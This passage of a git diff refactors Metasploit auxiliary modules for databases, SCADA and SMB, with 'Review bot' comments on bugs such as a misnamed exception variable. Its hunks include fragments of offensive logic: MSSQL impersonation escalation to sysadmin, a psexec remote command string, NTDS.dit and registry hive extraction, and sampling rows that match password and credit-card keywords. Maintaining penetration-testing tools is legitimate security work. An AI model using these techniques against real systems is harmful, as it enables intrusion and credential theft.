sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb index bd5d6ade57..4862f91e68 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb 
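Review bot: The rewritten line `print_error("#{db_user} is already a sysadmin, no esclation needed.")` in `run` of mssql_escalate_dbowner_sqli.rb keeps the misspelling "esclation"; the matching line in mssql_escalate_execute_as_sqli.rb reads "escalation", and that file's `run` hunk has "doesnt" in its impersonation error. Both lines are being rewritten by this commit, so the spelling can be fixed in the same pass: `print_error("#{db_user} is already a sysadmin, no escalation needed.")`. The first status message also ends in a dangling "from ..."; `print_status("Grabbing the database user name...")` would match the sibling module.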
@@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 346efa1109..e47f479dc2 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report 
@@ -28,60 +28,60 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name...") + print_status("Grabbing the database user name...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.") + print_error("#{db_user} is already a sysadmin, no escalation needed.") return else - print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_status("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Get list of users that can be impersonated - print_status("#{peer} - Enumerating a list of users that can be impersonated...") + print_status("Enumerating a list of users that can be impersonated...") imp_user_list = check_imp_users if imp_user_list.nil? || imp_user_list.empty? 
- print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.") + print_error("Sorry, the current user doesnt have permissions to impersonate anyone.") return else # Display list of users that can be impersonated - print_good("#{peer} - #{imp_user_list.length} users can be impersonated:") + print_good("#{imp_user_list.length} users can be impersonated:") imp_user_list.each do |dbuser| - print_status("#{peer} - #{dbuser}") + print_status(" #{dbuser}") end end # Check if any of the users that can be impersonated are sysadmins - print_status("#{peer} - Checking if any of them are sysadmins...") + print_status("Checking if any of them are sysadmins...") imp_user_sysadmin = check_imp_sysadmin(imp_user_list) if imp_user_sysadmin.nil? - print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.") + print_error("Sorry, none of the users that can be impersonated are sysadmins.") return end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...") + print_status("Attempting to impersonate #{imp_user_sysadmin}...") escalate_privs(imp_user_sysadmin,db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary # check if user is a sysadmin if parsed_result && parsed_result[0] == '1' - print_good("#{peer} - #{imp_user} is a sysadmin!") + print_good(" #{imp_user} is a sysadmin!") return imp_user else - print_status("#{peer} - #{imp_user} is NOT a sysadmin") + print_status(" #{imp_user} is NOT a sysadmin") end end diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index c81ae1b467..bd8f29568e 100644 
--- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index 976ce09e8b..457af07b52 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']), - OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']), + OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]), ], self.class) end diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index f97100c2e9..262375cd2f 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 689739c228..117abf5007 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner 
diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index 4b4c796a25..446dea3009 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 0ace058218..c6b54c2c7a 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_sql_file.rb b/modules/auxiliary/admin/mssql/mssql_sql_file.rb index 8c64f49cca..8cfa8c907b 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql_file.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index 5bb0e6830f..f4c7d52c2a 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 56578fa36f..e8dfd5f1ad 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index 731a58e444..07010cf1bc 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 8ec139cec0..07f3cc5b19 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index c9b9faccbb..4d5d54817d 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index e33a0db012..851ce5950a 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE 
diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index ee9efbb905..1a49166ddc 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 44e67f20d0..944e24c56a 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 581c65d9ac..2aa1311ec6 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 94a16f0d72..db6cfd7896 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index d9355644a7..fae25f3308 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index c5f9453f72..0e3e355eab 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index a9140ed59d..b22eb782cb 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index d7e50deacb..6a45802bf0 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 61c7a66ec0..ef2a7e452b 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index d8e837f799..ba24fc2314 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb 
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Pop2 diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index fa3abf8d31..2f2dd5bbd8 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 9a811c4d1d..4d588e1f2b 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Postgres diff --git a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb index 43f91cf73e..39dd75f68e 100644 --- a/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb +++ b/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index 383b187968..23d106176d 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 7e77949291..b3a912e0b1 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Exploiting sqli to extract users information...") + print_status("Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) separator = Rex::Text.rand_text_alpha(5 + rand(5)) @@ -134,21 +134,21 @@ class Metasploit3 < Msf::Auxiliary data = do_sqli(injection, mark) if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end @users = [] @plain_passwords = [] - print_status("#{peer} - Parsing extracted data...") + print_status("Parsing extracted data...") parse_users(data, mark, separator) if @users.empty? - print_error("#{peer} - Users not found") + print_error("Users not found") return else - print_good("#{peer} - #{@users.length} users found!") + print_good("#{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb index 2251e33566..0325a8274b 100644 --- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb +++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb 
@@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 53bf52ea84..fd29955621 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index aabbdc4cc3..1d91e140a4 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index 4906829d56..fc0368f945 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 6abc81f58e..5561973f04 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp 
diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index 6d0dde4b03..2c83b0530b 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::TcpServer diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index b12195b257..61bf21da5b 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 3f85ac29ef..70a0b33446 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb index 417aea54d2..a6c409ec32 100644 --- a/modules/auxiliary/admin/smb/delete_file.rb +++ b/modules/auxiliary/admin/smb/delete_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index d6aa05a4b6..07672ac4d4 100644 --- a/modules/auxiliary/admin/smb/download_file.rb 
+++ b/modules/auxiliary/admin/smb/download_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index 53e52f66e8..011b0d9c60 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 749b32d22e..5747494726 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Psexec include Msf::Auxiliary::Report @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue Rex::Proto::SMB::Exceptions::Error => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end res = execute_command(text, bat) 
@@ -96,31 +96,31 @@ class Metasploit3 < Msf::Auxiliary def execute_command(text, bat) # Try and execute the provided command execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" - print_status("#{peer} - Executing the command...") + print_status("Executing the command...") begin return psexec(execute) rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3) - print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") + print_error("Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command def get_output(file) - print_status("#{peer} - Getting the command output...") + print_status("Getting the command output...") output = smb_read_file(@smbshare, @ip, file) if output.nil? - print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") + print_error("Error getting command output. #{$!.class}. #{$!}.") return end if output.empty? - print_status("#{peer} - Command finished with no output") + print_status("Command finished with no output") return end # Report output - print_good("#{peer} - Command completed successfuly!") + print_good("Command completed successfuly!") vprint_status("Output for \"#{datastore['COMMAND']}\":") vprint_line("#{output}") @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary fd = smb_open(file, 'rwo') fd.close rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror - print_status("#{peer} - Unable to get handle: #{accesserror}") + print_status("Unable to get handle: #{accesserror}") return false end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") 
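Review bot: The rescue clause in `execute_command` binds the exception as `exec_command_error`, but the `elog` line directly below it interpolates `e.class`, `e.message` and `e.backtrace`. Nothing in this hunk defines `e`, so a failed `psexec` would most likely raise NameError inside the handler and the `print_error` and `return false` after it would never run. Use the bound name: `elog("#{exec_command_error.class} #{exec_command_error.message}\n#{exec_command_error.backtrace * "\n"}", 'rex', LEV_3)`. In `get_output`, the `output.nil?` branch prints `$!`, which is only set while an exception is being handled, so that message will probably show `NilClass` rather than a cause.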
@@ -155,19 +155,19 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin smb_file_rm(file) rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index dc1fd03215..0e7d8b9cf3 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']), OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']), OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']), - OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']), + OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]), ], self.class) end 
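Review bot: In `cleanup_after`, `left = files.collect{ |f| smb_file_exist?(f) }` produces a list of true/false values, so the "manually remove ..." message would print booleans rather than the names of the files still on the share. `left = files.select { |f| smb_file_exist?(f) }` keeps the `left.any?` test working and makes the message name the leftovers, which the operator needs in order to restore the host after a test. The same line appears in `cleanup_after` of psexec_ntdsgrab.rb (hunk `@@ -237,21 +237,21 @@`).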
@@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue StandardError => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end # If a VSC was specified then don't try and create one if datastore['VSCPATH'].length > 0 - print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") + print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else - unless datastore['CREATE_NEW_VSC'] == true + unless datastore['CREATE_NEW_VSC'] vscpath = check_vss(text, bat) end unless vscpath @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary download_ntds((datastore['WINPATH'] + "\\Temp\\ntds")) download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys")) else - print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.") + print_error("Failed to find a volume shadow copy. Issuing cleanup command sequence.") end end cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys") @@ -94,7 